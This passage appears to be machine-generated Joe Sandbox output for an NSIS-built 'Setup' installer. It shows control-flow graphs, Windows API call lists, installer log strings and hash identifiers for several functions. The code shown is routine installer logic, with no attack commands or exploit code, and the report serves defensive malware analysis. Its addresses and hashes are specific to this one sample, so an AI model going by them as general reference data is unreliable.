405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                        APIs
                                                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                        Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                        • String ID: jF
                                                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                        Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                        Strings
                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                        Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 KiUserCallbackDispatcher * 2 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                        Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
